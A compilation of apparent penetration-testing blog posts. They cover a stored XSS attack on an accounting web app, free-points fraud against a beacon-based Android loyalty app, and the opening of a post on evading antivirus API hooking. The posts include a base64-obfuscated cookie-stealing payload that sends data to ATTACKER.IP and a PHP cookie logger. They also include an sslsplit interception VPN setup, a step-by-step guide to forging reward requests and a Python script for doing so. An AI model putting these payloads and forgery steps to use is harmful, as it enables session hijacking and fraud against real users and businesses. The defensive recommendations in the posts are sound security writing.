{"id":3596,"content":"<div><br></div>","creationDate":"2017-03-13T19:42:36+0000","sender":{"id":77,"email":"[email protected]","status":"ACTIVE","role":"CLIENT_ADMIN","firstName":"John","lastName":"Doe","creationDate":"2016-01-22T18:14:23+0000"},"recipient":{"id":1,"email":"[email protected]","status":"ACTIVE","role":"OFFICE_ADMIN","firstName":"Admin","lastName":"Office","client":null,"creationDate":"2015-12-21T09:09:05+0000"},"modificationDate":null,"read":false,"attribute":null,"date":"13.03.2017 20:42"}

When I saw "content":"<div><br></div>" in the JSON request body, I knew I was right at home. The application swallowed and spat the contents of the message back out without any filtering at all. All supplied HTML tags were preserved.

I confirmed the presence of the XSS vulnerability by sending "content":"<script>alert(1)</script>" as a replacement for my message content, using the Edit feature and intercepting the request in Burp Proxy. After reloading, the page greeted me valiantly with a JavaScript alert box.

Seeing that the request contained recipient information as well, it would be wise to test for the ability to send messages to other users of the application by tampering with the recipient data. This would let an attacker launch phishing attacks against other users. At this point I didn't bother, as I had everything I needed to set up an attack that would hopefully grant me administrator privileges.

The Attack

In order to intercept the administrator's cookies, I decided to make my script create a new Image and append it to the document's body. The user's cookies would be sent to the attacker-controlled server via GET parameters embedded in the URL of a fake image on the attacker's web server.

The injected HTML code would look like this:

<img src="http://ATTACKER.IP/image.php?c=<stolen_cookies>" />

The moment the browser renders this image, all of the visitor's cookies (for the current domain) are sent to the attacker's server.

In order to dynamically inject the image into the document's body, I required a JavaScript one-liner to act as the XSS payload. Here it is:

var img = new Image(0,0); img.src='http://ATTACKER.IP/image.php?c=' + document.cookie; document.body.appendChild(img);

To make it less obvious and to obfuscate the payload a bit, I converted it to use base64 encoding:

eval(atob('dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwOi8vQVRUQUNLRVIuSVAvaW1hZ2UucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpbWcpOw'));

My payload was ready, but I also needed a server backend at http://ATTACKER.IP/image.php that would wait for stolen cookies and log them for later retrieval. Here is the simple PHP script I used to do the job. Just remember to create the secretcookielog9977.txt file in advance and give it R/W permissions:

<?php

// exit early unless the 'c' GET parameter holding the stolen cookies is present
if (isset($_GET['c'])) $cookie = $_GET['c']; else exit;

$log = 'secretcookielog9977.txt';

// collect metadata about the victim's request
$d = date('Y-m-d H:i:s');
$ua = $_SERVER['HTTP_USER_AGENT'];
$ip_addr = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];

// append the stolen cookies, together with the metadata, to the log file
$f = fopen($log, 'a+');
fputs($f, "Date: $d | IP: $ip_addr | UA: $ua | Referer: $referer\r\nCookies: $cookie\r\n\r\n");
fclose($f);

?>

With all that prepared, I returned to the application and edited my message for the last time. I intercepted the edit HTTP request and replaced the content data with:

"content":"<script>eval(atob('dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwOi8vQVRUQUNLRVIuSVAvaW1hZ2UucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpbWcpOw'));</script>"

I reloaded the page and checked secretcookielog9977.txt on my web server to confirm that I had managed to steal my own cookies. Everything worked perfectly.

Now all I had to do was wait for the site administrator to sign in and read my malicious message. Shortly after...

** JACKPOT **

I had the administrator's session token, valid for one full day. Because the token was a JSON Web Token, there was no way for the administrator to invalidate it, even if it was found to be compromised.

With the administrator's token captured, a real attacker could have done significant damage. For me, it was enough to demonstrate the risk and report my findings.

Game over

As demonstrated, the application had an evident stored XSS vulnerability that allowed the attacker to steal the administrator's cookies, including the session token. The XSS would have had much less impact if the cookie had been stored with the http-only flag, making it inaccessible from JavaScript. The session token, however, was made to be sent with every request to the REST API in a custom X-AUTH-TOKEN header, so making it accessible from JavaScript was mandatory.

Here are my two cents on how the security of the pentested application could be improved:

1. Never allow cookies containing session tokens to be accessible from javascript.

In my opinion, cookies that include the session token or other critical data should never be set without the http-only flag. The session token should be stored in a separate cookie flagged with http-only, and the REST API backend should reply with the following HTTP headers:

Access-Control-Allow-Origin: https://app.accounting.com
Access-Control-Allow-Credentials: true

Then, if the request to the REST API made from JavaScript is sent with the property withCredentials: true, the cookie with the session token will be automatically attached and securely sent to the backend server in a Cookie: header. Furthermore, the cookie will only be attached if the request is made from the https://app.accounting.com origin, protecting users from possible CSRF attacks. There is no need to use custom headers for transporting session tokens; it is always better to use standard cookies, which receive better protection from modern web browsers.
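
For illustration, the backend could then issue the token in a separate, locked-down cookie like this (the cookie name and value here are just examples):

Set-Cookie: SESSION_TOKEN=79c7d0c479011ca769be91c049dedae8b6e0cdec6c3ec7f652804fe446094b26; Path=/; Secure; HttpOnly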

2. Authorize users with randomly generated session tokens.

Using JSON Web Tokens as session tokens is reasonably secure if you use a strong secret key, but keep in mind that if your secret key ever gets leaked or stolen and attackers get hold of it, they will be able to forge their own session tokens, allowing them to impersonate every registered user of the application.

It is imperative for every web application to use randomly generated session tokens that can be invalidated at any time. Sessions should be invalidated every time the user signs in, signs out or resets their password. Such session handling will also protect users from session fixation attacks.

In the pentested application, the additional session token could be embedded inside the JWT itself, in the data section, like so:

{"tokenType":"AUTHORIZE","exp":1489663403,"id":77,"token":"79c7d0c479011ca769be91c049dedae8b6e0cdec6c3ec7f652804fe446094b26"}

It is important to note here that the application also used a JWT as the verification token inside the password reset link. Password reset functionality should always be handled using one-time tokens. Once the password is reset, the reset token should be invalidated to prevent anyone from using it again. Using JWT makes it possible to re-use the token for as long as the expiration timestamp allows.

3. Use Secure flag for all cookies.

If the application is served only via HTTPS (and it should be), setting the secure flag on cookies will allow them to be sent only over a secure HTTPS connection. That way, the application's session tokens will never be sent in plain text, protecting them against man-in-the-middle attacks.

Conclusion

I hope you found this little case study useful. Although I'm aware I haven't exhausted the subject of improper session handling or launching XSS attacks, I wanted to present a real-life scenario from a web application penetration test. If you are a web developer, you may from now on look differently at the implementation of session tokens, and maybe you will put more effort into filtering those nasty HTML tags in the output of user-supplied data.

If you are looking for a web application penetration tester or reverse engineer, I will be more than happy to hear about your project and how I can help you.

I am always available on Twitter @mrgretzky or directly via email [email protected].

Have a nice day and see you in my next post!

How I Hacked an Android App to Get Free Beer

18 August 2016 at 06:37

Just recently I stumbled upon an Android app that lets you receive free products in various pubs, restaurants and cafes in exchange for points accumulated through previous purchases. When a purchase is made, you let the vendor know that you want to receive points. In the app you select the types of products you bought; the eligible types may be "Beer", "Lunch" or "Spent 50 PLN", depending on the place. To verify the purchase, the vendor swipes a physical beacon device over your phone (or enters a PIN if that doesn't work) and the application magically approves the transaction, granting you points.

As an example, one of the places offers a free beer for 5 points and each purchased beer grants 1 point. That gives you a free beer for every 5 beers purchased in that place.

Everyone likes free beer, so the first thing I wondered was how secure the purchase verification process is and how exactly these magical beacons work.

More importantly, was there any way to get around the application's security and get a taste of free beer?


I intentionally don't want to mention the name of the application, as it only operates in my home country of Poland. My goal is to give you an idea of what flaws similar applications may have, how to find them and how to better secure such applications. I've retained all technical details on how the application works, occasionally replacing some easily identifiable IDs or private information with random data.

In this post I will use a fictional name for the discussed application - "EatApp".

With that out of the way, let's get started!

Doing the research

The first thing I was most curious about was the beacon technology used with the application. The beacons apparently communicate with the mobile phone over Bluetooth, as the application made it clear that Bluetooth needs to be turned on for beacon swipes to work.

After a very short time I found the company that manufactures the same beacons I saw working with EatApp. The company is Estimote, and this is what they write about their beacon technology:

Estimote Beacons and Stickers are small wireless sensors that you can attach to any location or object. They broadcast tiny radio signals which your smartphone can receive and interpret, unlocking micro-location and contextual awareness.

With the Estimote SDK, apps on your smartphone are able to understand their proximity to nearby locations and objects, recognizing their type, ownership, approximate location, temperature and motion. Use this data to build a new generation of magical mobile apps that connect the real world to your smart device.

Estimote Beacons are certified Apple iBeaconโ„ข compatible as well as support Eddystoneโ„ข, an open beacon format from Google.

Apparently the EatApp application detects the restaurant's beacon in close proximity, retrieves some identification values from the device and uses them to authorize the registration of new points with the EatApp server.


Thankfully, Estimote has released an SDK with very detailed documentation.

That allowed me to learn more about what information the beacon transmits. The technical documentation says that:

Estimote Beacon is a small computer. Its 32-bit ARMยฎ Cortex M0 CPU is accompanied by accelerometer, temperature sensor, and what is most importantโ€”2.4 GHz radio using Bluetooth 4.0 Smart, also known as BLE or Bluetooth low energy.

I've also learned that beacons broadcast the following values:

  • UUID - most commonly represented as a string, e.g. โ€œB9407F30-F5F8-466E-AFF9-25556B57FE6Dโ€
  • Major number - an unsigned short integer, i.e., an integer ranging from 1 to 65535, (0 is a reserved value)
  • Minor number - also an unsigned short integer, like the major number.

Great! They also provide their own Android library that makes it very easy for any application to listen for beacon broadcasts. Here is one of the example code snippets from the tutorial on how to set up a beacon listener:

beaconManager = new BeaconManager(getApplicationContext());
// add this below:
beaconManager.connect(new BeaconManager.ServiceReadyCallback() {
    @Override
    public void onServiceReady() {
        beaconManager.startMonitoring(new Region(
                "monitored region",
                UUID.fromString("B9407F30-F5F8-466E-AFF9-25556B57FE6D"),
                22504, 48827));
    }
});

It looked to me like the UUID must be constant and unique to the application using it. The Major and Minor numbers, on the other hand, can describe the product, so in the EatApp scenario they must be unique to every restaurant.

Whenever the application waits for the vendor to swipe their beacon over the phone, it listens for packets with the specific UUID. If a broadcast packet is detected, it uses the signal strength value to measure the beacon's proximity to the Android device. If the beacon's signal strength indicates that the device is close enough, the application uses the Major and Minor numbers from the packet as validation keys, which are sent with the authorization packet to EatApp's server.

I wondered what the maximum range was over which the beacon was able to transmit its packets. The application must be constantly listening for beacon broadcast messages, as it even gives you a push notification when you enter a restaurant where an EatApp beacon is present. I didn't have to search long for an answer:

Estimote Beacons have a range of up to 70 meters (230 feet). The signal, however, can be diffracted, interfered with, or absorbed by water (including the human body). Thatโ€™s why in real world conditions you should expect range of about 40โ€“50 meters.

Wow. Up to 70 meters? That means that, in theory, the security keys (UUID, Major and Minor numbers), which are very likely used for authorizing the rewards, are broadcast in the clear, over the air! That can't be good.

Knowing that beacon broadcast packets can be received over such a range, I needed to find a way to receive the packets and read their contents. It would probably have taken me a few days to write my own Android app using the Estimote SDK, but thankfully Estimote provides its own Estimote Developer App for debugging and troubleshooting. From the screenshots I could tell that it gathers all the critical information.
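
In fact, no vendor app is strictly needed - any BLE scanner can read these values. As a rough illustration, here is a Python sketch, assuming a recent version of the cross-platform bleak library, that prints every iBeacon frame in range:

import asyncio
import struct

from bleak import BleakScanner  # pip install bleak

APPLE_COMPANY_ID = 0x004C  # iBeacon frames live in Apple's manufacturer data

def on_advertisement(device, adv):
    frame = adv.manufacturer_data.get(APPLE_COMPANY_ID)
    if not frame or frame[:2] != b'\x02\x15':  # 0x02 0x15 marks an iBeacon frame
        return
    uuid = frame[2:18].hex()
    major, minor = struct.unpack('>HH', frame[18:22])  # big-endian shorts
    print(f'UUID={uuid} Major={major} Minor={minor} RSSI={adv.rssi}')

async def main():
    async with BleakScanner(on_advertisement):
        await asyncio.sleep(30)  # listen for 30 seconds

asyncio.run(main())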

At that moment, obtaining the beacon information would not do me much good without any insight into how the application communicates with the server. It was time to set up a small lab for intercepting and decrypting HTTPS communication from the mobile phone.

The Fiddler in the Middle

For intercepting mobile phone traffic, I used a Windows box. The best free HTTP/HTTPS Windows proxy for inspecting and forging packets that I know of is Fiddler.

Setting up Fiddler

In order to enable HTTPS interception in Fiddler, open Tools > Telerik Fiddler Options > HTTPS and make sure Capture HTTPS CONNECTs and Decrypt HTTPS traffic are checked. Also make sure that under Tools > Telerik Fiddler Options > Connections, you have ticked the Allow remote computers to connect option.

You will also need to export Fiddler's Certificate Authority certificate. In the same tab, click Actions and then Export Root Certificate to Desktop, like so:

[screenshot: exporting Fiddler's root certificate to the desktop]

This will put a file named FiddlerRoot.cer on your desktop. This is the root certificate that Fiddler will use to generate forged certificates for every HTTPS connection that goes through the proxy. Obviously, Fiddler's generated root certificate won't be on your phone's list of trusted certificate authorities, and any HTTPS connection that goes through the proxy will be blocked. That's why you need to import Fiddler's certificate on your phone and add it to the trusted CA storage.

To do that, first copy FiddlerRoot.cer to your phone's SD card by any means. On your phone, open Settings > Security and select Install from SD card:

[screenshot: installing the certificate from the SD card on Android]

Find and pick Fiddler's certificate file to import it. Now your phone will trust Fiddler's proxy and you will be able to intercept and decrypt HTTPS traffic. Make sure that both your phone and your Windows box with Fiddler are running on the same network.

Before you proceed, find out which port Fiddler's proxy listens on by opening Tools > Telerik Fiddler Options > Connections and checking the port box:

[screenshot: Fiddler's proxy port setting]

Next, find out the local network IP address of your Windows box. Open the cmd.exe command-line prompt and type ipconfig. You should find your current IP address under the section for the network interface you are currently using.

On your Android phone, open Settings > Wi-Fi and find the wireless network you are connected to. Touch the network entry for 2 seconds and select Modify network from the drop-down menu. In the dialog, tick Advanced options and scroll down to the proxy settings. For the proxy type, set Manual, and under hostname and proxy port enter the IP address of your Windows box and Fiddler's proxy port. I entered 192.168.0.14 as the hostname and 9090 as the proxy port number.

Now if everything went fine, you should be able to see the outgoing mobile phone traffic in Fiddler.

Capturing traffic

With this setup I was able to intercept EatApp's traffic, as the application didn't implement certificate pinning. Otherwise, more work would have been required: I'd have had to decompile the application, remove the certificate comparison check and recompile it.

I opened EatApp and brought up the Earn Points dialog for a randomly picked restaurant. As I didn't have the restaurant's Estimote beacon on me (duh!), I had to use the option to enter a PIN to verify the point rewards. I entered a random PIN and checked the intercepted packets in Fiddler.

Sent request:

POST https://api.eatapp.com/users/461845f5d03e6c052a43afbc/points HTTP/1.1
Accept: application/json
Accept-Language: en-us
X-App-Version: 1.28.0
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4;)
...
Content-Type: application/json; charset=UTF-8
Content-Length: 265
Host: api.eatapp.com
Connection: Keep-Alive
Accept-Encoding: gzip

{
  "authentication_token":"boKUp9vBHNAJp7XbWZCK",
  "point":{
    "promoted_products_ids":[
      {"id":"760493597149625959620000"},
      {"id":"760493597149625959620000"}
    ],
    "pin":"1234",
    "place_id":"6088",
    "isDoneByGesture":false
  },
  "longitude":0.0,
  "latitude":0.0
}

Received reply:

HTTP/1.1 422 Unprocessable Entity
Server: nginx
Date: ...
Content-Type: application/json; charset=utf-8
Content-Length: 99
Connection: keep-alive
Vary: Accept-Encoding

{
  "status":"422 Unprocessable Entity",
  "code":"incorrectArgument",
  "title":"Incorrect argument: pin."
}

The request is not complicated. Parameters are sent as JSON data, there are no hash values sent as an anti-tampering measure tied to account state verification, and the PIN is sent in plain text. The parameters are pretty self-explanatory:

  • authentication_token - This is the account's authentication token that was received from the server during the login process. This value is unique to every EatApp account and won't change.
  • promoted_products_ids - the array of product type IDs that we are earning points for.
  • pin - the PIN number that we've entered.
  • place_id - the unique ID of the restaurant where we want to earn points.
  • isDoneByGesture - this one is a mystery, but I believe it is set to true only when you spend your points.
  • longitude and latitude - These are the last known GPS location values that were retrieved recently, letting the server know the user's exact geographical location. This could be used as a security measure to detect whether we are too far away from the restaurant we are receiving points in.

At this point I wanted to find out whether the application was vulnerable to PIN brute-forcing. After all, there are only 10,000 possible PIN combinations. Unfortunately, after sending about 5 requests with different PIN values, I started to receive the following reply from the server:

HTTP/1.1 422 Unprocessable Entity
Server: nginx
Date: ...
Content-Type: application/json; charset=utf-8
Content-Length: 289
Connection: keep-alive
Vary: Accept-Encoding

{
  "status":"422 Unprocessable Entity",
  "code":"pinTooManyAttempts",
  "title":"Too many pin code attempts",
  "header":"Account locked",
  "message":"Earning and spending points and redeeming deals using your account has been locked for the next 30 minutes. Please let us know if this is a mistake."
}

Unless I had hundreds of EatApp accounts to switch between during the brute-force process, the 30-minute account lockdown is a pretty strong deterrent.

Looking at the parameters of the verification request, I wondered what the parameters would be if the verification was done with a beacon swipe rather than by entering the PIN.

One idea for how free points could be earned would be to remotely intercept the request packet carrying the correct PIN value entered by the restaurant's staff. Intercepting the packet remotely would also give me the opportunity to find the exact request parameters when a beacon swipe was used instead of the PIN.

The main obstacle in performing this task was that I had to intercept the request from the mobile device while I was at the restaurant.

This was a great opportunity to try setting up an interception VPN to be used with the 3G/4G connection on my mobile phone. The VPN server would then intercept and decrypt the HTTPS traffic the same way Fiddler did.

The Evil VPN

First of all, I required a VPS where I could install the VPN software. The fastest, easiest and most reliable way to set up a Linux VPS is Digital Ocean (you will get a $10 credit if you sign up from this link). I created the cheapest Debian 8 1-CPU 512MB RAM droplet for $5/month (or $0.007/hour). This had to be more than enough for my needs.

I had to decide which VPN protocol I wanted to use. Android officially supports the PPTP and L2TP VPN protocols. I learned that although PPTP is supported, it is considered insecure, and Google doesn't trust it enough to enable the Always-On feature for this kind of VPN. The Always-On VPN feature in Android makes sure that your phone reconnects to the VPN whenever the connection breaks and that no packet is ever sent outside the VPN. This was very important, as I wanted to be absolutely sure that every single packet would get intercepted and decrypted.

Finding a good tutorial teaching how to install an L2TP VPN on Debian 8 was very hard, as most tutorials were written for Debian 7; apparently some dependencies changed in the later version of the system and the tutorials became outdated.

Finally I found a perfect way to install an IPsec/L2TP VPN with auto-setup scripts. This is basically all I had to do on the server:

wget https://git.io/vpnsetup -O vpnsetup.sh
nano -w vpnsetup.sh
[Replace with your own values: YOUR_IPSEC_PSK, YOUR_USERNAME and YOUR_PASSWORD]
sudo sh vpnsetup.sh

YOUR_IPSEC_PSK - this should be your pre-shared key phrase (e.g. my_secret_psk_for_vpn).
YOUR_USERNAME and YOUR_PASSWORD - the username and password used to log in to the VPN.

All done, in fire-and-forget manner! The VPN was up and running. Now it was time to set up the VPN connection on my phone. I went to Settings > Wireless & Networks (More) > VPN, added a new VPN and filled in the settings as follows:

Name: vpn_interceptor
Type: L2TP/IPSec PSK
Server address: [VPN_SERVER_IP]
L2TP secret: (not used)
IPSec identifier: (not used)
IPSec pre-shared key: [YOUR_IPSEC_PSK]
DNS search domains: (not used)
DNS servers: 8.8.8.8
Forwarding routes: (not used)

Now that the VPN was added, I tapped the triple-dot Settings button in the same window, selected the Always-On option and picked the newly created VPN connection.

This is when I ran into a problem on my Android 6.0 device. No matter how hard I tried to get the VPN to connect, it would always show a connection error. I tried on another device running Android 4.4 and it worked perfectly, so I knew something was wrong with the latest version of Android. The GitHub page of the auto-setup script did mention a workaround for Android 6 Marshmallow:

Note: Android 6 (Marshmallow) users should edit /etc/ipsec.conf on the VPN server and append ,aes256-sha2_256 to both ike= and phase2alg= lines. Then add a new line sha2-truncbug=yes immediately after those. Indent lines with two spaces. When finished, run service ipsec restart.

That didn't work, so I removed that "fix" from the server config files. Shortly after, I found a feature in the VPN profile settings called Backwards-compatible mode. I set it to Enable and *bang* - finally everything started to work.

Now that I had a working VPN, it was time to set up the interception and decryption of HTTPS packets. For that I decided to use the SSLsplit software. Installation was easy:

wget http://mirror.roe.ch/rel/sslsplit/sslsplit-0.5.0.tar.bz2
tar jxvf sslsplit-0.5.0.tar.bz2
cd sslsplit-0.5.0
make
sudo make install

The IPsec/L2TP installation script created some advanced firewall settings for my new VPN setup, and honestly I was not able to adjust them in a way that allowed me to redirect HTTP/HTTPS packets to the sslsplit proxy. I decided to completely purge the iptables settings and replace the iptables config file with a clean one, including some settings for redirecting packets to sslsplit.

iptables -F
iptables -t nat -F
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -t nat -A POSTROUTING -o ppp+ -j MASQUERADE
iptables-save > /etc/iptables.rules

Packet forwarding should already have been enabled (and should be re-enabled at every boot) by the VPN auto-setup script, but to be sure, you can run:

echo 1 > /proc/sys/net/ipv4/ip_forward

Next, I prepared the directory structure for the sslsplit log files and created the sslsplit root certificate that would be used for generating forged HTTPS certificates, the same way Fiddler did before:

mkdir sslsplit
mkdir sslsplit/certs
mkdir sslsplit/logs
cd sslsplit/certs
openssl genrsa -out ca.key 2048
openssl req -new -x509 -days 3650 -key ca.key -out ca.crt

I had to download the sslsplit/certs/ca.crt root certificate from the VPS, copy it to my phone's SD card and import it as a trusted certificate authority. That way my Android phone would accept any forged certificate generated by sslsplit. You can easily download the ca.crt file from your VPS over the SSH protocol on Windows using WinSCP.

To easily turn the HTTP/HTTPS interception on and off on the server, I decided to create two small shell scripts (my sslsplit directory was put in /root/):

/root/sslsplit/start.sh

#!/bin/bash
iptables-restore < /etc/iptables.rules
iptables -t nat -A PREROUTING -i ppp+ -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -i ppp+ -p tcp --dport 443 -j REDIRECT --to-ports 8443
sslsplit -d -l /root/sslsplit/connections.log -j /root/sslsplit/ -F /root/sslsplit/logs/%T -k certs/ca.key -c certs/ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

/root/sslsplit/stop.sh

#!/bin/bash
killall sslsplit
iptables-restore < /etc/iptables.rules

Now, whenever I wanted to start intercepting packets, I'd run ./start.sh, and when I wanted to stop, ./stop.sh. Simple. sslsplit was configured to run as a daemon and would log all raw packets into separate files in the /root/sslsplit/logs/ directory. The logging feature of sslsplit is not perfect: it doesn't fully decode saved HTTP packets, it doesn't group packets in request/reply order, and it will put several packets into one file if they are sent within the same second. For my needs, though, it had to do. I will describe later how I overcame the HTTP decoding issue.

With the VPN setup done and HTTPS interception in place, I was finally able to drive to town, eat something and do some live packet capturing!

Trip to town

I visited three places and ordered some food in each of them. During checkout I asked the vendor to register EatApp points for the products I had just bought. The whole time, my phone was connected to the interception VPN and the authorization packets were logged on the server by sslsplit.

I found out that if the location permission was turned off, the beacon proximity feature wouldn't work; thus in two places the staff had to use PIN authorization. I retrieved two packets with correct PIN values from the first two places, and in the third place I was able to capture the beacon authorization packet after enabling the location permission for the app.

I finally had an opportunity to check out the official Estimote developer's app, which was supposed to detect nearby beacon broadcasts and retrieve the broadcasted UUID, Major and Minor. It turned out my theory was correct:

[screenshot: Estimote developer's app showing the detected beacon's UUID, Major and Minor]

I still had to confirm at home, by analyzing the sslsplit log files, whether the broadcasted authorization keys were really used in the authorization packet.

Connecting the dots

I downloaded the sslsplit log files from the server. The issue with sslsplit is that it logs all HTTP packets in their raw form, meaning that if the Transfer-Encoding is chunked or the packet is compressed with gzip, the packets won't be logged in decoded plain-text form.

I have released a small script that decodes the sslsplit packets into clear-text form. Please note that the script uses the quite buggy http-parser library, which I decided to use for parsing HTTP packets. For simple needs, though, it is "good enough". You can find splitparse.py on GitHub here.

Usage:

pip install http-parser
python splitparse.py -i [sslsplit_logs_dir] -o [output_dir]

I quickly found the request packet with the authorization data that was sent when the beacon was swiped over my phone:

POST /users/461845f5d03e6c052a43afbc/points
Accept: application/json
Accept-Language: en-gb
X-App-Version: 1.28.0
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1;)
...
Content-Type: application/json; charset=UTF-8
Content-Length: 375
Host: api.eatapp.com
Connection: Keep-Alive
Accept-Encoding: gzip

{
  "authentication_token":"boKUp9vBHNAJp7XbWZCK",
  "latitude":...,
  "longitude":...,
  "point":{
    "isDoneByGesture":false,
    "main_beacon":{
      "major":38995,
      "minor":12702,
      "uuid":"2C75E74B-41B7-49E3-BD26-CE86B2F569F8"
    },
    "place_id":"450",
    "promoted_products_ids":[
      {"id":"647035946536601578040000"},
      {"id":"647035946536601578040000"},
      {"id":"647035946536601578050000"}
    ]
  }
}

Jackpot! I confirmed that the UUID, Major and Minor numbers in the authorization request packet were exactly the same as the ones detected live with the Estimote developer's app. That meant my theory was correct and the verification keys are constantly being broadcast over the air in every EatApp-supported restaurant.

To summarize, here is the step-by-step guide on how to get free EatApp points in restaurant ZZZ:

  • Walk into restaurant ZZZ.
  • Open up Estimote developer's app and detect the closest nearby beacon.
  • Save the screenshot with the visible UUID, Major and Minor values.
  • Go home.
  • Set a breakpoint in Fiddler to intercept outgoing EatApp requests with the /users/ path.
  • On your phone, select the ZZZ restaurant and set EatApp to await PIN authorization for earned points.
  • Enter any PIN.
  • Modify the intercepted packet in Fiddler, removing the "pin":"NNNN" entry and replacing it with the valid "main_beacon":{...} content containing the beacon keys captured with Estimote app.
  • Let the modified packet through to EatApp server.
  • Enjoy your free points!

Of course, it would be much better to write your own tool to communicate directly with the application's server API while implementing proper location spoofing. The method I described is just quicker and easier for testing purposes.
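
As a rough sketch of what the core of such a tool could look like in Python, reusing the values captured above (the "EatApp" API is fictional and the GPS coordinates are made up for illustration):

import requests

forged = {
    'authentication_token': 'boKUp9vBHNAJp7XbWZCK',
    'latitude': 52.2297,    # spoofed location near the restaurant (made up)
    'longitude': 21.0122,
    'point': {
        'isDoneByGesture': False,
        'main_beacon': {    # beacon keys sniffed over the air
            'major': 38995,
            'minor': 12702,
            'uuid': '2C75E74B-41B7-49E3-BD26-CE86B2F569F8',
        },
        'place_id': '450',
        'promoted_products_ids': [{'id': '647035946536601578040000'}],
    },
}

resp = requests.post(
    'https://api.eatapp.com/users/461845f5d03e6c052a43afbc/points',
    json=forged,
    headers={'Accept': 'application/json', 'X-App-Version': '1.28.0'},
)
print(resp.status_code, resp.text)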

Conclusion

Broadcasting authorization keys publicly over the air is never a good idea. Here is a list of things that could be done to improve EatApp's security:

  • Send a hash value of the account's current state as an additional request parameter (points for every restaurant, account name, last sent GPS location etc.). The server would then verify the hash and only authorize the request if it is correct. Finding out how the hash parameter is formed would not be possible without disassembling and reverse engineering the application's code, which would add an extra layer of difficulty.
  • In order to make reverse engineering harder, the application's code should be obfuscated. If the additional hash verification parameter was implemented, obfuscation would greatly increase the difficulty of reverse engineering the application's code.
  • @FabricatorGeneral mentioned in the comment section that it is possible to enable the Secure UUID feature in Estimote's beacons, which broadcasts the beacon keys in encrypted form. That way only applications with the correct API key are able to decrypt them. Bypassing that would require writing a custom mobile application implementing the Estimote SDK that listens to broadcasts and decrypts them with the application's API key, which would first have to be retrieved by reverse engineering the application's code.
  • Certificate pinning should be implemented to make it harder to intercept the HTTPS connection using forged certificates. This security feature could also be bypassed, but it would involve reverse engineering the application, finding where the certificate verification check is done, removing it and recompiling the application.
  • I'm not sure whether this is possible with Estimote Beacons, but it would be good to provide restaurants with a second beacon, used only for authorizing transactions, with a maximum broadcast range of half a meter.
  • Never trust the client's device! For maximum security, the client's device should only send the reward request to the server, without any authorization keys. The server would then send an authorization request to the vendor's dedicated tablet behind the counter, asking them to authorize the point rewards with the proper keys. Beacon swiping or entering the PIN would only be done on the vendor's device, making it impossible for the client to intercept a request that could later be used to craft forged packets.

I strongly hope that you've learned something new today and that you found this post entertaining.

If you have any questions, want to send your feedback or you want to contact me for any other reason, you can find me on Twitter @mrgretzky or contact me directly via e-mail at [email protected].

Till next time!

Now it's time to enjoy the spoils of hard work. Cheers!

Edit @2016-08-19: Added two new methods of securing the application in the Conclusion section.


Defeating Antivirus Real-time Protection From The Inside

28 July 2016 at 05:01

Hello again! In this post I'd like to talk about the research I did some time ago on antivirus real-time protection mechanisms and the effective ways I found to evade them. This method may even work for evading analysis in sandbox environments, but I haven't tested that yet.

The specific AV I tested this method against was BitDefender. It performs real-time protection for every process in user-mode and detects suspicious behaviour patterns by monitoring calls to the Windows API.

Without further ado, let's jump right to it.

What is Realtime Protection?

Detecting malware by signature is still done, but it is not very efficient. More and more malware uses polymorphism, metamorphism, encryption or code obfuscation to make itself extremely hard to detect with the old detection methods. Most new-generation AV software implements behavioural detection analysis: it monitors every running process on the PC and looks for suspicious activity patterns that may indicate the computer was infected with malware.

As an example, let's imagine a program that doesn't create any user interface (dialogs, windows etc.) and, as soon as it starts, wants to connect to and download files from an external server in Romania. This kind of behaviour is extremely suspicious, and most AV software with real-time protection will stop such a process and flag it as dangerous, even if it is being seen for the first time.

Now you may ask - how does such protection work and how does the AV know what the monitored process is doing? In the majority of cases, the AV injects its own code into the running process, which then performs Windows API hooking of the specific API functions that are of interest to the protection software. API hooking allows the AV to see exactly which function is called, when, and with what parameters. Cuckoo Sandbox, for example, does the same thing to generate its detailed report on how the running program interacts with the operating system.

Let's take a look at what a hook would look like for the CreateFileW API imported from the kernel32.dll library.

This is how the function code looks in its original form:

76B73EFC > 8BFF                         MOV EDI,EDI
76B73EFE   55                           PUSH EBP
76B73EFF   8BEC                         MOV EBP,ESP
76B73F01   51                           PUSH ECX
76B73F02   51                           PUSH ECX
76B73F03   FF75 08                      PUSH DWORD PTR SS:[EBP+8]
76B73F06   8D45 F8                      LEA EAX,DWORD PTR SS:[EBP-8]
...
76B73F41   E8 35D7FFFF                  CALL <JMP.&API-MS-Win-Core-File-L1-1-0.C>
76B73F46   C9                           LEAVE
76B73F47   C2 1C00                      RETN 1C

Now, if an AV were to hook this function, it would replace the first few bytes with a JMP instruction that redirects the execution flow to its own hook handler function. That way, the AV registers the execution of this API with all parameters lying on the stack at that moment. After the AV hook handler finishes, it executes the original set of bytes that were replaced by the JMP instruction and jumps back into the API function for the process to continue its execution.

This is how the function code would look like with the injected JMP instruction:

Hook handler:
1D001000     < main hook handler code - logging and monitoring >
...
1D001020     8BFF                       MOV EDI,EDI              ; original code that was replaced with the JMP is executed
1D001022     55                         PUSH EBP
1D001023     8BEC                       MOV EBP,ESP
1D001025    -E9 D72EB759                JMP kernel32.76B73F01    ; jump back to CreateFileW to instruction right after the hook jump

CreateFileW:
76B73EFC >-E9 FFD048A6                  JMP handler.1D001000     ; jump to hook handler
76B73F01   51                           PUSH ECX                 ; execution returns here after hook handler has done its job
76B73F02   51                           PUSH ECX
76B73F03   FF75 08                      PUSH DWORD PTR SS:[EBP+8]
76B73F06   8D45 F8                      LEA EAX,DWORD PTR SS:[EBP-8]
...
76B73F46   C9                           LEAVE
76B73F47   C2 1C00                      RETN 1C

There are multiple ways of hooking code, but this one is the fastest and doesn't create much of a bottleneck in code execution performance. Other hooking techniques involve injecting INT3 instructions or setting up Debug Registers and handling them with your own exception handlers, which later redirect execution to the hook handlers.

